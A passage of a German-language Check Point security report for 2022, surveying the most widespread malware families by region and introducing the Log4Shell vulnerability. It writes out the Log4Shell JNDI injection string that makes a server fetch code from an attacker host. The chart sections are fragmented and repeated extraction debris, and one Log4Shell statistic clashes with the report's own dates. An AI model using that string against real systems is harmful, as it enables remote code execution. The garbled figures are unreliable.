Ob in einem gezielten Angriff oder in einer opportunistischen Kampagne durch einen unerfahrenen Angreifer, ermöglichen E-Mail- basierte Angriffe eine einfache Verteilung von Malware an eine Vielzahl von Zielen und Unternehmen.

Einer der Gründe für den Anstieg der E-Mail- basierten Angriffe ist die beträchtliche Anzahl groß angelegter Kampagnen, die von kriminellen Gruppen gesponsert und durchgeführt werden. Diese verbreiten die derzeit bekanntesten Malware-Familien wie TrickBot, Dridex, Qbot, IcedID und Emotet.

Nachdem diese Gruppen die Effektivität von Spam-Kampagnen mit bösartigen Office- Dokument-Anhängen erkannt hatten, verwendeten sie diese fast ausschließlich als Hauptinfektionsvektor für neue Netzwerke.

K A P I T E L 5

41CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 41CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

TOP MALWARE-FAMILIEN

Abbildung 10: Meist verbreitete Malware weltweit. Prozentsatz der Unternehmensnetzwerke, die von jedem Malware-Typ angegriffen werden.

Abbildung 11: Die meist verbreitete Malware in Amerika.

AMERIKA

Tr ick

bo t

Qb ot

Fo rm

bo ok

Em ot

et

Dr id

ex

Ag en

tT es

la

Ph or

pi ex

Re m

co s

Gl up

te ba

XM Ri

g

11.0%

5.2% 5.0% 4.9% 4.4% 4.1% 4.0% 4.0% 3.7% 3.5%

GLOBAL

Tr ick

bo t

Re m

co s

Fo rm

bo ok

Ph or

pi ex

Dr id

ex

Em ot

et Qb

ot

Gl up

te ba

XM Ri

g

Ra cc

oo n

9.7%

3.6% 3.5% 3.5% 3.0% 3.0% 2.9% 2.6% 2.4% 2.4%

GLOBALE MALWARE-STATISTIKEN Die in den folgenden Abschnitten dieses Berichts vorgestellten Datenvergleiche basieren auf Daten, die aus der Check Point ThreatCloud Cyberbedrohungskarte zwischen Januar und Dezember 2021 entnommen wurden.

Für jede der unten aufgeführten Regionen stellen wir die am weitesten verbreitete Malware vor.

K A P I T E L 5

https://threatmap.checkpoint.com/ThreatPortal/livemap.html

42CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 42CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Abbildung 12: Die häufigste Malware in der EMEA-Region.

EUROPA, NAHER OSTEN UND AFRIKA (EMEA)

Abbildung 13: Die häufigste Malware in der APAC-Region.

ASIEN-PAZIFIK (APAC)

Tr ick

bo t

Qb ot

Em ot

et

Dr id

ex

Fo rm

bo ok

Ag en

tT es

la

Re m

co s

Ph or

pi ex

XM Ri

g

Gl up

te ba

10.8%

7.8%

5.9% 5.4% 5.0% 4.7%

4.2% 3.6% 3.6% 3.3%

Tr ick

bo t

Fo rm

bo ok

Ra m

ni t

Gl up

te ba

Ag en

tT es

la

Ph or

pi ex

Em ot

et

XM Ri

g

Dr id

ex

Ur sn

if

14.5%

7.8% 7.5% 7.1% 6.9% 6.2% 6.0% 5.7%

4.8% 4.8%

K A P I T E L 5

43CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 43CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

GLOBALE ANALYSE DER TOP MALWARE Im Gegensatz zu unserem letzten jährlichen globalen Malware-Ranking sind RigEK (Exploit Kit) und der LokiBot Infostealer nicht mehr in unserer Top 10 vertreten, sondern durch das Glupteba-Botnet und Remcos RAT abgelöst worden.

TrickBot hat im Februar Emotet von der Spitze der Rangliste verdrängt und diese Position für den Rest des Jahres 2021 gehalten. TrickBot ist ein modularer Botnet- und Banken-Trojaner, der auf das Windows-Betriebssystem abzielt. Ihm wird die Wiederbelebung von Emotet im November 2021 zugeschrieben, da er die gleiche Malware verbreitete. TrickBot wird ständig aktualisiert und um neue Fähigkeiten, Funktionen und Verbreitungswege erweitert, was es zu einer flexiblen und anpassbaren Malware macht, die im Rahmen von Mehrzweckkampagnen verbreitet werden kann. Es diente als beliebtes Mittel für den Erstzugang bei gezielten Angriffen, gefolgt von Malware wie Ryuk, Conti oder Bazar. Obwohl TrickBot im Oktober 2020 kurzzeitig außer Gefecht gesetzt wurde, blieb er das ganze Jahr 2021 über in unseren Top-Malware-Charts vertreten und war an einem der schwerwiegendsten Ransomware-Angriffe des Jahres beteiligt, einem Angriff der Conti-Ransomware auf die Gesundheitsbehörde Irlands.

Phorpiex ist ein Botnet, das auf seinem Höhepunkt mehr als eine Million infizierter Hosts kontrollierte. Es ist dafür bekannt, andere Malware-Familien über Spam- Kampagnen zu verbreiten sowie groß angelegte Spam- und Sextorsionskampagnen zu unterstützen und Ransomware zu verbreiten. Phorpiex, das Mitte des Jahres seine geringste Verbreitung erreicht hatte, belegte Ende 2021 einen höheren Rang als vor einem Jahr. Im Dezember entdeckte Check Point Research das Wiederaufleben von Phorpiex mit einer brandneuen Variante namens "Twizt", die den Betrieb im Peer-to-Peer-Modus ohne aktive C&C-Server ermöglichte. Innerhalb eines Jahres haben Phorpiex-Bots 969 Transaktionen erfolgreich gekapert und 3,64 Bitcoins, 55,87 Ether und 55.000 US-Dollar in ERC20-Token

gestohlen, was fast einer halben Million US-Dollar entspricht.

K A P I T E L 5

https://blog.checkpoint.com/2021/03/11/february-2021s-most-wanted-malware-trickbot-takes-over-following-emotet-shutdown/ https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/ https://threatpost.com/emotet-resurfaces-trickbot/176362/ https://www.raconteur.net/technology/the-five-most-important-ransomware-attacks-of-2021/ https://research.checkpoint.com/2019/in-the-footsteps-of-a-sextortion-campaign/ https://research.checkpoint.com/2021/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/ https://research.checkpoint.com/2021/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/

44CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 44CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Abbildung 14: Die häufigsten Botnets weltweit

Abbildung 16: Die häufigsten Botnets in der EMEA-Region

GLOBAL

Abbildung 15: Die häufigsten Botnets in Amerika

Abbildung 17: Die häufigsten Botnets in der APAC-Region

AMERIKA

EUROPA, NAHER OSTEN UND AFRIKA (EMEA) ASIEN-PAZIFIK (APAC)

35%

12% 11%

11%

10%

27%

19% 15%

13%

9%

8%

29%

14%

13% 12%

12%

TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Glupteba Phorpiex Emotet Dridex MyloBot Other

11% 10%

27%

13%

11%11%

9%

23%

10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Phorpiex Dridex Emotet Qbot Glupteba Other

10%

9%

6%

35%

12% 11%

11%

10%

27%

19% 15%

13%

9%

8%

29%

14%

13% 12%

12%

TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Glupteba Phorpiex Emotet Dridex MyloBot Other

11% 10%

27%

13%

11%11%

9%

23%

10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Phorpiex Dridex Emotet Qbot Glupteba Other

10%

9%

6%

35%

12% 11%

11%

10%

27%

19% 15%

13%

9%

8%

29%

14%

13% 12%

12%

TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Glupteba Phorpiex Emotet Dridex MyloBot Other

11% 10%

27%

13%

11%11%

9%

23%

10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Phorpiex Dridex Emotet Qbot Glupteba Other

10%

9%

6%

35%

12% 11%

11%

10%

27%

19% 15%

13%

9%

8%

29%

14%

13% 12%

12%

TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Glupteba Phorpiex Emotet Dridex MyloBot Other

11% 10%

27%

13%

11%11%

9%

23%

10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Phorpiex Dridex Emotet Qbot Glupteba Other

10%

9%

6%

TOP BOTNE TS

K A P I T E L 5

45CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 45CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

GLOBALE ANALYSE DER BOTNETS Insgesamt sind die gleichen Malware-Familien in den globalen Botnet-Charts vertreten wie im Jahr 2020, wobei sich die Prävalenz der einzelnen Familien leicht verändert hat. Dridex zum Beispiel fiel vom zweiten auf den vierten Platz zurück, während TrickBot auf den ersten Platz aufstieg.

Emotet, eine der berüchtigtsten Malware-Gruppen, operiert seit 2014 in Abständen, zunächst als Banken-Trojaner und später als Botnet. Es steht jetzt auf Platz drei der Top-Botnet-Charts. Emotet war weit verbreitet, bevor es im Januar 2021 vom Netz genommen wurde. Weltweit waren mehr als 1,5 Millionen Rechner betroffen, der Schaden wird auf rund 2,5 Milliarden US-Dollar geschätzt. Er ist berüchtigt für die Verbreitung anderer Malware-Familien wie TrickBot, Qbot und anderen.

Der Botnet-Marktplatz wurde in diesem Jahr durch den Untergang von Emotet drastisch beeinflusst. Emotet ist eines der größten PC-Botnets, und seine Abwesenheit hinterließ ein Vakuum, das von TrickBot, IcedID und seit kurzem auch Phorpiex gefüllt wurde. Am 15. November, also nur 10 Monate nach seiner Stilllegung, begannen die mit TrickBot infizierten Rechner Emotet-Code abzuwerfen. Die Computer wurden zunehmend durch eine große Spam-Kampagne kompromittiert, die bösartige Dokumente mit Emotet-Payloads nutzte.

Wir stellen fest, dass Emotet sowohl in unseren Ranglisten für das erste Halbjahr 2021 als auch für das gesamte Jahr 2021 auf den ersten drei Plätzen zu finden ist, obwohl es neun Monate lang nicht aktiv war – ein Beweis seiner

unvergleichlichen Stärke.

K A P I T E L 5

https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/

46CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 46CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Abbildung 18: Top-Info-Diebstahl-Malware weltweit

Abbildung 20: Top-Info-Diebstahl-Malware in der EMEA-Region

GLOBAL

Abbildung 19: Top-Info-Diebstahl-Malware in Amerika

Abbildung 21: Top-Info-Diebstahl-Malware in der APAC-Region

AMERIKA

EUROPA, NAHER OSTEN UND AFRIKA (EMEA) ASIEN-PAZIFIK (APAC)

18%

12%

10%

8%6%

14%

13%

9%

8% 7%7%

Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger Other

Formbook AgentTesla LokiBot Vidar NanoCore Raccoon Other

7%

18%

16%

11% 8%7%

33%

16%

13%

9%

9%

38%

8%7%

Formbook AgentTesla Raccoon LokiBot Vidar NanoCore Other

Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot Other

39%

42%

7%

18%

12%

10%

8%6%

14%

13%

9%

8% 7%7%

Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger Other

Formbook AgentTesla LokiBot Vidar NanoCore Raccoon Other

7%

18%

16%

11% 8%7%

33%

16%

13%

9%

9%

38%

8%7%

Formbook AgentTesla Raccoon LokiBot Vidar NanoCore Other

Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot Other

39%

42%

7%

18%

12%

10%

8%6%

14%

13%

9%

8% 7%7%

Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger Other

Formbook AgentTesla LokiBot Vidar NanoCore Raccoon Other

7%

18%

16%

11% 8%7%

33%

16%

13%

9%

9%

38%

8%7%

Formbook AgentTesla Raccoon LokiBot Vidar NanoCore Other

Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot Other

39%

42%

7%

18%

12%

10%

8%6%

14%

13%

9%

8% 7%7%

Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger Other

Formbook AgentTesla LokiBot Vidar NanoCore Raccoon Other

7%

18%

16%

11% 8%7%

33%

16%

13%

9%

9%

38%

8%7%

Formbook AgentTesla Raccoon LokiBot Vidar NanoCore Other

Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot Other

39%

42%

7%

TOP INFOSTE ALER MALWARE

K A P I T E L 5

47CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 47CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

GLOBALE ANALYSE DER INFOSTEALER-MALWARE Die Landschaft der Infostealer wird nach wie vor von mehreren verborgenen Malware-Familien beherrscht. AgentTesla, ein prominenter Infostealer, der erstmals im Jahr 2014 entdeckt wurde, verzeichnete im Vergleich zum Jahr 2020 einen deutlichen Rückgang seiner Verbreitung, und zwar um 50 %. LokiBot, ein 2016 aufgetauchter Infostealer, verzeichnete einen ähnlichen Rückgang.

An der Spitze der Rangliste steht Formbook, eine Malware zum Diebstahl von Informationen, die seit 2016 als Service in Untergrundforen verkauft wird. Die Malware ist darauf ausgelegt, über Keylogging Informationen zu sammeln. Mitte 2021 wurde eine neue Formbook-Variante in freier Wildbahn entdeckt. Die Variante wurde im Rahmen einer Phishing-Kampagne verbreitet, bei der PowerPoint- Dokumente als E-Mail-Anhänge für die Verbreitung der Malware genutzt wurden.

Ein weiterer Malware-as-a-Service, der zum ersten Mal in unsere Top-Malware- Statistik aufgenommen wurde, ist Raccoon. Dieser Infostealer, der seit mindestens zwei Jahren im Dark Web verkauft wird, bietet eine gut gewartete Plattform für seine Partner, die schnelle Fehlerbehebungen und automatische Updates für seine Payloads sowie für auf den Rechnern der Opfer installierte Malware bietet.

Zu den jüngsten Updates von Raccoon gehört die Fähigkeit, Kryptowährungen zu stehlen, weitere Malware abzulegen und sich über Google SEO statt über Phishing-E-Mails zu verbreiten. Die aktuelle Kampagne versucht, ihre Opfer mit dem Angebot geknackter Softwarelizenzen zu ködern.

K A P I T E L 5

https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/ https://threatpost.com/raccoon-stealer-google-seo/168301/

48CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 48CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Abbildung 22: Top Krypto-Mining-Malware Global

Abbildung 24: Top Krypto-Mining-Malware in EMEA

GLOBAL

Abbildung 23: Top Krypto-Mining-Malware in Amerika

Abbildung 25: Top Krypto-Mining-Malware in APAC

AMERIKA

EUROPA, NAHER OSTEN UND AFRIKA (EMEA) ASIEN-PAZIFIK (APAC)

50%

12%

7%

41%

5%5%4%3%

43%

8%6%

XMRig LemonDuck RubyMiner DarkGate Kinsing Other

XMRig LemonDuck WannaMine NRSMiner RubyMiner Other

2%

6%

43%

15%

13%

8%

15%

4%

XMRig LemonDuck RubyMiner WannaMine NRSMiner Other

XMRig RubyMiner LemonDuck DarkGate Kinsing Other

27%

42%

6%

33%

2% 50%

12%

7%

41%

5%5%4%3%

43%

8%6%

XMRig LemonDuck RubyMiner DarkGate Kinsing Other

XMRig LemonDuck WannaMine NRSMiner RubyMiner Other

2%

6%

43%

15%

13%

8%

15%

4%

XMRig LemonDuck RubyMiner WannaMine NRSMiner Other

XMRig RubyMiner LemonDuck DarkGate Kinsing Other

27%

42%

6%

33%

2% 50%

12%

7%

41%

5%5%4%3%

43%

8%6%

XMRig LemonDuck RubyMiner DarkGate Kinsing Other

XMRig LemonDuck WannaMine NRSMiner RubyMiner Other

2%

6%

43%

15%

13%

8%

15%

4%

XMRig LemonDuck RubyMiner WannaMine NRSMiner Other

XMRig RubyMiner LemonDuck DarkGate Kinsing Other

27%

42%

6%

33%

2%

50%

12%

7%

41%

5%5%4%3%

43%

8%6%

XMRig LemonDuck RubyMiner DarkGate Kinsing Other

XMRig LemonDuck WannaMine NRSMiner RubyMiner Other

2%

6%

43%

15%

13%

8%

15%

4%

XMRig LemonDuck RubyMiner WannaMine NRSMiner Other

XMRig RubyMiner LemonDuck DarkGate Kinsing Other

27%

42%

6%

33%

2%

TOP KRYPTO-MINING-MALWARE

K A P I T E L 5

49CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 49CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

GLOBALE ANALYSE DER KRYPTOMINER XMRig, ein legitimes Monero-Mining-Tool, das von Bedrohungsakteuren für

böswillige Zwecke genutzt wurde, führt nicht nur weiterhin die Rangliste der

Cryptominer an, sondern hat auch seine Popularität im Vergleich zu 2020 um über

25 % gesteigert. Zwei Malware-Familien sind in diesem Jahr zum ersten Mal in

die Rangliste der Kryptominer aufgenommen worden: LemonDuck, das bereits die

zweite Position nach XMRig belegt, und CryptoBot.

LemonDuck, dessen Angriffsrate im Vergleich zur Halbjahresstatistik um mehr

als 50 % gestiegen ist, ist ein sich selbst verbreitendes Cryptomining-Botnet,

das Funktionen zum Diebstahl von Anmeldeinformationen, zur Umgehung

von Erkennungsmaßnahmen und Funktionen zur Seitwärtsbewegung bietet.

LemonDuck fungiert auch als Malware-Downloader und wird häufig beim Ablegen

des Ramnit-Trojaners beobachtet.

CryptoBot ist ein fortschrittlicher Kryptominer, der nach der Infektion die Wallets

und Kontoinformationen des Opfers erfasst. Im Dezember wurde CryptoBot bei

einer Kampagne beobachtet, die auf Benutzer mit einer Raubkopie des Windows-

Betriebssystems abzielt. Die Kampagne nutzt ein spezielles Aktivierungs-Tool

namens KMSPico, das die Windows Key Management Services (KMS) austrickst,

um eine raubkopierte Windows-Version als legitim zu authentifizieren. Wenn ein

Benutzer eine kompromittierte Version des Tools herunterlädt, wird CryptoBot

unbemerkt über Hintergrundprozesse installiert. Ähnlich wie LemonDuck wurde

CyptoBot zuvor dabei beobachtet, als Teil seiner Infektionskette den EternalBlue-

Exploit zu nutzen.

K A P I T E L 5

https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/ https://www.moneycontrol.com/news/technology/hackers-target-windows-pirates-with-cryptobot-malware-7806771.html https://redcanary.com/blog/kmspico-cryptbot/ https://www.izoologic.com/2020/02/01/cryptobot-derived-from-famous-malwares-attacking-asian-countries/

50CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 50CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Abbildung 26: Die häufigsten Banken-Trojaner weltweit

Abbildung 28: Die häufigsten Banken-Trojaner in der EMEA-Region

GLOBAL

Abbildung 27: Die häufigsten Banken-Trojaner in Amerika

Abbildung 29: Die häufigsten Banken-Trojaner in der APAC-Region

AMERIKA

EUROPA, NAHER OSTEN UND AFRIKA (EMEA) ASIEN-PAZIFIK (APAC)

36%

11% 11%

9%

5%

26%

19%

13% 8%

7%

5%

30%

14%

12%

21%

TrickBot Qbot Dridex IcedID Ursnif Ramnit Other

TrickBot Ramnit Dridex Ursnif Qbot IcedID Other

7%

8%

31%

16% 11%

10%

7%

21%

8%

TrickBot Qbot Dridex Ursnif Ramnit IcedID Other

TrickBot Dridex Qbot Ursnif IcedID Zloader Other

21%

22%

4%

7% 36%

11% 11%

9%

5%

26%

19%

13% 8%

7%

5%

30%

14%

12%

21%

TrickBot Qbot Dridex IcedID Ursnif Ramnit Other

TrickBot Ramnit Dridex Ursnif Qbot IcedID Other

7%

8%

31%

16% 11%

10%

7%

21%

8%

TrickBot Qbot Dridex Ursnif Ramnit IcedID Other

TrickBot Dridex Qbot Ursnif IcedID Zloader Other

21%

22%

4%

7%

36%

11% 11%

9%

5%

26%

19%

13% 8%

7%

5%

30%

14%

12%

21%

TrickBot Qbot Dridex IcedID Ursnif Ramnit Other

TrickBot Ramnit Dridex Ursnif Qbot IcedID Other

7%

8%

31%

16% 11%

10%

7%

21%

8%

TrickBot Qbot Dridex Ursnif Ramnit IcedID Other

TrickBot Dridex Qbot Ursnif IcedID Zloader Other

21%

22%

4%

7%

36%

11% 11%

9%

5%

26%

19%

13% 8%

7%

5%

30%

14%

12%

21%

TrickBot Qbot Dridex IcedID Ursnif Ramnit Other

TrickBot Ramnit Dridex Ursnif Qbot IcedID Other

7%

8%

31%

16% 11%

10%

7%

21%

8%

TrickBot Qbot Dridex Ursnif Ramnit IcedID Other

TrickBot Dridex Qbot Ursnif IcedID Zloader Other

21%

22%

4%

7%

TOP BANKING TROJANSTOP BANKEN-TROJANER

K A P I T E L 5

51CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 51CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

GLOBALE ANALYSE DER BANKEN-TROJANER Die Landschaft der Banken-Trojaner wird seit einigen Jahren von einer Reihe getarnter, anpassungsfähiger Malware-Familien dominiert. TrickBot kletterte vom zweiten Platz an die Spitze der globalen Rangliste, während Dridex vom ersten auf den dritten Platz zurückfiel, im Vergleich zu 2020 ein Rückgang um fast 60 %.

Qbot ist eine sich ständig weiterentwickelnde Banking-Malware, die ursprünglich entwickelt wurde, um Bankdaten und Tastatureingaben zu erfassen. Er verfügt über die Fähigkeiten eines Wurms, fungiert aber auch als Botnet, das häufig von Ransomware-Kampagnen genutzt wird, um Malware auf infizierte Geräte zu schleusen. Im September nahm Qbot nach einer dreimonatigen Pause seine Tätigkeit wieder auf und führte eine groß angelegte Spam-Kampagne durch, bei der die Malware als Botnet und Infostealer eingesetzt wurde und den Malware- Loader „SquirrelWaffle“ verbreitete. Die jüngste Kampagne stützte sich auf Visual Basic und Excel 4.0-Makros. Im November wurde die Monetarisierungsphase der Kampagne beobachtet, als der Malware-Dropper begann, die Conti Ransomware zu installieren.

Dridex, eine weitere Banking-Malware, die jetzt auch Infostealer- und Botnet- Funktionen besitzt, verzeichnete in diesem Jahr einen deutlichen Rückgang. Im September entdeckten Forscher jedoch eine neue Dridex-Variante mit erweiterten Möglichkeiten zum Informationsdiebstahl, die sich über eine Phishing-Kampagne mit speziell präparierten Excel-Dokumenten verbreitet. Darüber hinaus gehörte Dridex im Dezember zu den ersten Schadprogrammen, die in einer Kampagne verbreitet wurden, die die Log4j-Schwachstelle zur Infektion ausnutzt.

K A P I T E L 5

https://cisomag.eccouncil.org/qbot-malware-attack/ https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/ https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/

52CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 52CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Abbildung 30: Mobile Top Malware weltweit

Abbildung 32: Mobile Top Malware in der EMEA-Region

GLOBAL

Abbildung 31: Mobile Top Malware in Amerika

Abbildung 33: Mobile Top Malware in der APAC-Region

AMERIKA

EUROPA, NAHER OSTEN UND AFRIKA (EMEA) ASIEN-PAZIFIK (APAC)

26%

11%10%

14%

39%

29%

17% 13%

7%

Hiddad xHelper AlienBot FluBot Other

Hiddad xHelper AlienBot FluBot Other

44%

18%

16%

20%

Hiddad xHelper AlienBot FluBot Other

2%34%

xHelper Hiddad AlienBot FluBot Other

30%

16% 11%

3%

40%26%

11%10%

14%

39%

29%

17% 13%

7%

Hiddad xHelper AlienBot FluBot Other

Hiddad xHelper AlienBot FluBot Other

44%

18%

16%

20%

Hiddad xHelper AlienBot FluBot Other

2%34%

xHelper Hiddad AlienBot FluBot Other

30%

16% 11%

3%

40%

26%

11%10%

14%

39%

29%

17% 13%

7%

Hiddad xHelper AlienBot FluBot Other

Hiddad xHelper AlienBot FluBot Other

44%

18%

16%

20%

Hiddad xHelper AlienBot FluBot Other

2%34%

xHelper Hiddad AlienBot FluBot Other

30%

16% 11%

3%

40%

26%

11%10%

14%

39%

29%

17% 13%

7%

Hiddad xHelper AlienBot FluBot Other

Hiddad xHelper AlienBot FluBot Other

44%

18%

16%

20%

Hiddad xHelper AlienBot FluBot Other

2%34%

xHelper Hiddad AlienBot FluBot Other

30%

16% 11%

3%

40%

MOBILE TOP MALWARE

K A P I T E L 5

53CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 53CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

GLOBALE ANALYSE VON MOBILER MALWARE Hiddad, eine Android-Malware zur Anzeige von Werbung, nutzte zuvor Covid-19 als Motiv und behauptete seinen Platz an der Spitze der Rangliste, zusammen mit xHelper, dessen Verbreitung im Vergleich zu 2020 um 25 % zurückging. In diesem Jahr schafften es zwei weitere Malware-Familien zum ersten Mal in die Rangliste, dazu kamen zwei ganz neue Malware-Familien: AlienBot und FluBot.

AlienBot ist eine Banking-Malware für Android, die von Bedrohungsakteuren als Malware-as-a-Service verbreitet wird. Die Malware ermöglicht es einem Angreifer, aus der Ferne beliebigen Code in legitime Finanzanwendungen einzuschleusen, sich so Zugang zu den Bankkonten der Opfer zu verschaffen und schließlich deren Gerät vollständig zu kontrollieren. Im März entdeckte Check Point Research einen neuen Dropper namens „Clast82“, der über den Google Play Store verbreitet wird und AlienBot auf den Geräten der Opfer installiert. Der Dropper nutzt eine Reihe von Techniken, um eine Erkennung durch Google Play Protect zu vermeiden. So wird zum Beispiel ein nicht bösartiger Payload während des Testzeitraums verworfen, und nach dessen Ablauf wird der Payload zu AlienBot geändert.

FluBot, eine weitere Banking-Malware für Android, tauchte Ende 2020 auf, zielte auf europäische Nutzer ab und verbreitete sich über SMS-Nachrichten, die von infizierten Geräten gesendet wurden. FluBot-Kampagnen setzen auf kreative Themen; eine Kampagne, die im Juni und November auf finnische Nutzer abzielte, nutzte das Thema Sprachnachrichten und forderte ihre Opfer über den Link eines Mobilfunkanbieters auf, Nachrichten abzuhören. Ironischerweise enthält eine Kampagne, die sich an Nutzer in Neuseeland richtet, ein gefälschtes Sicherheitsupdate, das die Opfer vor FluBot-Infektionen warnt.

K A P I T E L 5

https://research.checkpoint.com/2020/covid-19-goes-mobile-coronavirus-malicious-applications-discovered/ https://research.checkpoint.com/2020/covid-19-goes-mobile-coronavirus-malicious-applications-discovered/ https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/ https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/ https://threatpost.com/flubot-malware-targets-androids-with-fake-security-updates/175276/ https://threatpost.com/flubot-malware-targets-androids-with-fake-security-updates/175276/ https://www.bleepingcomputer.com/news/security/finland-warns-of-flubot-malware-heavily-targeting-android-users/ https://www.bleepingcomputer.com/news/security/flubot-android-malware-now-spreads-via-fake-security-updates/

54CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 54CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

K A P I T E L 6

WICHTIGE GLOBALE SCHWACHSTELLEN

06

VIELE DER 2017 ENTDECKTEN SCHWACHSTELLEN WAREN AUCH 2021 NOCH SEHR PRÄSENT UND ÜBERSCHATTETEN DIE NEU ENTDECKTEN SCHWACHSTELLEN

55CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 55CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Die folgende Liste der häufigsten Schwachstellen basiert auf Daten, die vom IPS (Intrusion Prevention Systems) von Check Point erfasst wurden, und enthält einige der beliebtesten und interessantesten Angriffstechniken und Exploits, die von Check Point-Forschern im Jahr 2021 beobachtet wurden.

„LOG4SHELL“ APACHE LOG4J – REMOTE CODE EXECUTION (CVE-2021-44228) Apache Log4j ist ein quelloffenes Protokollierungspaket für Java, das von der Apache Software Foundation als Teil der Apache Logging Services bereitgestellt wird. Es ist die populärste Java-Protokollierungsbibliothek, die in Millionen von Java-Anwendungen weltweit verwendet wird, um Aktivitäten wie routinemäßige Systemoperationen und Fehlermeldungen aufzuzeichnen und Diagnosen an Systemadministratoren zu senden. Am 9. Dezember veröffentlichte die Apache Foundation eine aktualisierte Version von Log4j, um eine kritische Schwachstelle im Logging-Framework zu beheben. Diese Schwachstelle ermöglicht es Bedrohungsakteuren, einen Computer zu kompromittieren, indem sie eine einfache Zeichenfolge wie „${jndi:ldap://attacker_server/path}“ als Teil der HTTP- Anforderung, des User-Agents oder einer anderen Eingabe senden, die vom Server mit Log4j protokolliert wird. Durch die Kontrolle der protokollierten Nachrichten über das Logging-Paket könnte beliebiger Code von einem entfernten Server ausgeführt werden. Die „Log4Shell“ genannte Sicherheitslücke hat Sicherheitsexperten sofort in Alarmbereitschaft versetzt, da sie weitreichende Auswirkungen auf Millionen von Unternehmen hat, darunter Cisco, Twitter, Cloudflare, Tesla, Amazon und Apple, die Log4j verwenden. Die Schwachstelle wurde beinahe sofort auf breiter Front ausgenutzt, sowohl von Angreifern mit geringen Kenntnissen, um Kryptominer zu verbreiten, als auch von staatlich gesponserten APT-Gruppen, um Zugang zu Unternehmensnetzwerken zu erhalten. Laut Check Point Research waren in der ersten Jahreshälfte 2021 etwa 48,3 % der

Unternehmen von Ausnutzungsversuchen der Log4Shell-Schwachstelle betroffen.

K A P I T E L 6

https://logging.apache.org/log4j/2.x/index.html https://logging.apache.org/log4j/2.x/security.html https://research.checkpoint.com/2021/the-laconic-log4shell-faq/ https://www.wired.com/story/log4j-log4shell/ https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/ https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

56CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 56CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

